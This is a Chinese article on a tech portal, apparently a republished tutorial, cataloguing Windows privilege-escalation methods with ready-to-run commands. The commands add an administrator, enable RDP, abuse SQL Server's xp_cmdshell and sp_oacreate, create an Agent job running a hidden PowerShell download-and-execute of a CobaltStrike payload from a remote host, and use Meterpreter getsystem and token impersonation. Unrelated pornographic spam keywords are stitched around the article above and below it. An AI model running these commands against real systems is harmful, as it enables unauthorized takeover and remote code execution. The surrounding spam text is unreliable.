国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

Windows提權的幾種常用姿勢

安全 網站安全
Windows常用的提權方式有:內核提權、數據庫提權、系統配置錯誤提權、組策略首選項提權、Bypass UAC提權、令牌竊取提權等姿勢。

本文轉載自微信公眾號「Bypass」,作者Bypass 。轉載本文請聯系Bypass公眾號。

當獲取主機權限時,我們總是希望可以將普通用戶提升為管理員用戶,以便獲得高權限完全控制目標主機。Windows常用的提權方式有:內核提權、數據庫提權、系統配置錯誤提權、組策略首選項提權、Bypass UAC提權、令牌竊取提權等姿勢。

[[375513]]

1. 內核溢出漏洞提權

由于目標系統沒有及時安裝補丁,攻擊者可以利用Windows系統內核溢出漏洞進行提權,輕易獲取system權限。

(1) 通過systeminfo比對KB編號,發現系統是否存在漏洞。

github項目地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester

(2) 找到對應漏洞的exp執行,獲取system權限

github項目地址:https://github.com/SecWiki/windows-kernel-exploits

(3) 添加管理員

  1. net user 用戶名 密碼 /add 
  2. net localgroup Administrators 用戶名 /add 

(4) 開啟遠程桌面

  1. # 開啟遠程 
  2. REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 
  3. # 查詢遠程端口 
  4. REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 

2. 數據庫提權

(1) MySQL提權

利用mysql的幾種提權方式,如udf提權、mof提權、啟動項提權等。

  • udf提權:通過創建用戶自定義函數,對mysql功能進行擴充,可以執行系統任意命令,將mysql賬號root轉化為系統system權限。
  • mof提權:在windows平臺下,c:/windows/system32/wbem/mof/nullevt.mof 這個文件會每間隔一段時間(很短暫)就會以system權限執行一次,所以,只要我們將我們先要做的事通過代碼存儲到這個mof文件中,就可以實現權限提升。
  • 啟動項提權:將后面腳本上傳到系統啟動目錄,當服務器重啟就會自動執行該腳本,從而獲取系統權限。

(2) SQL Server 提權

利用SQL Sercer執行系統命令的方式也有多種,比如xp_cmdshell、SP_OACREATE、沙盒、Agent Job、CLR來提權。

使用xp_cmdshell進行提權:

  1. # 啟用xp_cmdshell 
  2. EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE; 
  3. # 通過xp_cmdshell執行系統命令 
  4. Exec master.dbo.xp_cmdshell 'whoami' 

SP_OACREATE:

  1. # 開啟組件 
  2. EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;    
  3. EXEC sp_configure 'show advanced options', 0; 
  4. # 執行系統命令(無回顯) 
  5. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami' 

通過沙盒執行命令:

  1. # 開啟沙盒 
  2. exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 
  3. # 利用jet.oledb執行命令 
  4. select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")') 

通過Agent Job執行命令:

修改開啟Ageent Job,執行無回顯CobaltStrike生成powershell上線

  1. USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.214.129:80/a''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1'; 

3. 系統配置錯誤提權

(1) 權限配置錯誤

如果管理員權限配置錯誤,將導致低權限用戶對高權限運行的文件擁有寫入權限,那么低權限用戶就可以替換成惡意后門文件,獲取系統權限。一般在啟動項、計劃任務,服務里查找錯誤配置,嘗試提權。

(2) 可信任服務路徑漏洞

(3) 不安全的注冊表權限配置

如果低權限用戶對程序路徑所對應的鍵值有寫權限,那么就可以控制這個服務,運行后門程序,從而獲取權限。

  1. # 存儲Windows服務有關的信息 
  2. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services 
  3. # 服務對應的程序路徑存儲 
  4. HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vulnerable Service\服務名\ImagePath 
  5. 3.4 AlwaysInstallElevated 

注冊表鍵AlwaysInstallElevated是一個策略設置項。windows允許低權限用戶以System權限運行安裝文件。如果啟用此策略設置項,那么任何權限用戶都能以NT AUTHORITY\SYSTEM權限來安裝惡意的MSI(Microsoft Windows Installer)文件。

4. 組策略首選項提權

SYSVOL是域內的共享文件夾,用來存放登錄腳本、組策略腳本等信息。當域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導致安全問題。

(1) 訪問SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。

(2) 使用kali自帶的gpp-decrypt進行破解

5. Bypass UAC提權

UAC(User Account Control,用戶賬號控制),是微軟引入的一種安全機制。Bypass UAC提權,可以將管理員權限提升到system權限。

使用msf模塊:

  1. msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac  
  2. meterpreter > getuid 
  3. meterpreter > getsystem 

6. 令牌竊取提權

通過竊取令牌獲取管理員權限,在MSF中,可以使用incognito實現token竊取。

  1. meterpreter > use incognito           #進入incognito模塊 
  2. meterpreter > list_tokens -u          #列出令牌 
  3. meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"   #模擬令牌 

 

責任編輯:趙寧寧 來源: Bypass
相關推薦

2021-01-06 08:04:30

Linux方式提權

2018-07-05 10:44:09

Windows提權漏洞

2019-12-01 22:34:42

提權web安全漏洞

2024-01-15 00:25:59

2016-12-12 09:11:20

2017-04-17 19:48:51

2020-11-16 10:55:41

Windows

2016-09-26 14:40:25

Windows內網實用命令

2011-03-07 11:36:23

FileZillaSe

2017-04-17 18:38:03

Windows提權漏洞

2023-09-11 06:59:59

2016-11-11 08:51:47

2009-07-25 16:52:29

2020-04-13 15:25:01

MySQL數據庫模糊搜索

2017-04-17 20:08:19

2021-05-01 20:52:30

漏洞網絡安全網絡攻擊

2023-06-11 17:24:26

2024-10-18 08:53:49

SpringMybatis微服務

2013-11-29 15:34:00

2015-09-22 10:25:13

點贊
收藏

51CTO技術棧公眾號

亚洲影音先锋| 99999色| av在线精品| 精品国产91久久久久久老师| 亚洲国产一区二区精品视频| 无码国模国产在线观看| 色天使色偷偷av一区二区| 男女私大尺度视频| 新狼窝色av性久久久久久| 国产精品蜜臀在线观看| 秋霞久久久久久一区二区| 日韩国产欧美| 欧美精品激情在线| 波多野结衣乳巨码无在线观看| 欧美色欧美亚洲高清在线视频| 99热在线这里只有精品| 欧美日韩亚洲国产精品| 欧美在线国产精品| 午夜久久av| 美女福利精品视频| av在线不卡精品| 精品亚洲男同gayvideo网站| 国产激情视频在线| 欧美午夜视频网站| 国产在线资源| 日韩欧美在线影院| sese综合| 中文字幕亚洲综合久久| 欧美日韩精品综合| 伊人精品影院| 在线观看欧美日韩国产| 国产精品毛片久久| 久久综合久久色| 亚洲人成在线观看| 日本欧美一区二区在线观看| 性开放的欧美大片| 国产精品一区二区三区久久 | 亚洲最大色综合成人av| 亚洲国产欧美另类丝袜| 亚洲精品福利| 免费一级特黄特色毛片久久看| 91精品国产一区二区| 日韩电影免费在线| 亚洲爆乳无码专区| 亚洲视频777| 三级亚洲高清视频| 青梅竹马是消防员在线| 日韩一区视频在线| 99精品国产99久久久久久福利| 91制片厂毛片| 久久网福利资源网站| 狠狠色丁香久久婷婷综合丁香| 日韩资源在线| 成人国产精品一区二区| 亚洲乱码中文字幕综合| 麻豆视频久久| 奇米影视亚洲色图| 亚洲国产成人精品一区二区 | 亚洲视频欧美视频| 国产小视频免费在线观看| 欧美高清视频免费观看| 欧美国产日韩在线观看| 同性恋视频一区| 头脑特工队2在线播放| 国产日韩中文字幕在线| 天天影视涩香欲综合网 | 成人a免费视频| 亚洲国产乱码最新视频| 亚洲区小说区| 一个人免费观看视频www在线播放| 久久久久久久网站| 久久精品日韩一区二区三区| 国产区一区二| 香蕉视频在线观看网站| 国精产品一区二区| 欧美色爱综合网| 青娱乐精品视频在线| 日本在线啊啊| 黄色一级片av| 亚洲美女免费精品视频在线观看| 日韩图片一区| 78精品国产综合久久香蕉| 国产福利一区视频| 欧美贵妇videos办公室| 亚洲视频中文字幕| 亚洲欧美日韩视频二区| 黄色aa久久| 男女羞羞视频网站| 九九九九九精品| 欧美成人免费观看| 欧美人与性动xxxx| 一区二区三区鲁丝不卡| 不卡影院免费观看| 视频一区在线视频| 欧美私人啪啪vps| 日韩欧美高清在线播放| 日韩视频在线直播| 性生大片免费观看性| 欧美综合第一页| 国产精品私人自拍| 北条麻妃在线一区二区免费播放| 日本精品免费在线观看| 欧洲亚洲妇女av| 亚洲曰韩产成在线| 伊人情人综合网| 精品三区视频| 天堂中文字幕在线| 欧美人与动牲交xxxxbbbb| 久久久午夜视频| 欧美日本一道本在线视频| 国产成人精品一区二区三区四区| 精品视频高潮| 黄色激情在线播放| 制服丝袜影音先锋| 日韩精品不卡| 奇米一区二区三区四区久久| 日韩欧美一二三四区| 国产精品人成在线观看免费| 亚洲人成久久| 午夜a一级毛片亚洲欧洲| 搞黄网站在线观看| 尤物国产在线观看| 日韩精品久久一区二区| 久久福利电影| 国产成人精品免费视频| 国产婷婷成人久久av免费高清 | 日本a口亚洲| 玖玖精品在线| 欧美精品videos另类| а√最新版地址在线天堂| 人妻无码久久一区二区三区免费| 亚洲自拍另类欧美丝袜| 久久久久久久久久久免费| 日韩高清中文字幕| 欧美人牲a欧美精品| 亚洲一区二区视频| 久久久久久97三级| 91丨porny丨国产| 成人免费毛片嘿嘿连载视频| 久久99国产精品久久99果冻传媒| 国产欧美精品久久| 亚洲激情专区| 亚洲一区国产| 日本美女视频一区二区| 午夜一区在线| 久久一二三四| 日韩av电影天堂| 久久久人人人| 美女一区二区视频| 国产福利一区二区| 成人高清免费观看| 久久这里只有精品6| 亚洲欧洲性图库| 五月婷婷综合激情| 欧美视频精品一区| 69堂精品视频| 亚洲图中文字幕| 欧美极品欧美精品欧美视频 | 北条麻妃一区二区三区在线观看 | 在线国产精品一区| 亚洲深夜影院| 免费在线欧美黄色| 激情综合网激情| 99久久精品免费| ●精品国产综合乱码久久久久| 疯狂欧美牲乱大交777| 91精品国产一区二区三区 | 国产精品沙发午睡系列| 欧美 激情 在线| 久久手机免费观看| 波多野结衣在线播放| 亚洲天堂中文字幕在线观看| 欧美日韩xxxx| 性伦欧美刺激片在线观看| 成人综合激情网| 欧美性生交xxxxx久久久| 日韩av在线看| 欧美在线视频a| 先锋影音一区二区三区| 综合激情丁香| 欧美日韩在线观看首页| 成人羞羞视频在线看网址| 久久99热99| 欧美视频在线观看免费| 超在线视频97| 精品国产_亚洲人成在线| 国产黄视频网站| 香蕉伊大人中文在线观看| 亚洲va在线| 亚洲婷婷在线视频| 精品无人区太爽高潮在线播放| 国产精品美女网站| 国产精品视频黄色| 亚洲欧美小说色综合小说一区| 93在线视频精品免费观看| 中文字幕精品综合| 日韩在线免费观看视频| 大桥未久一区二区三区| 中文字幕在线观看网站| 亚洲91中文字幕无线码三区|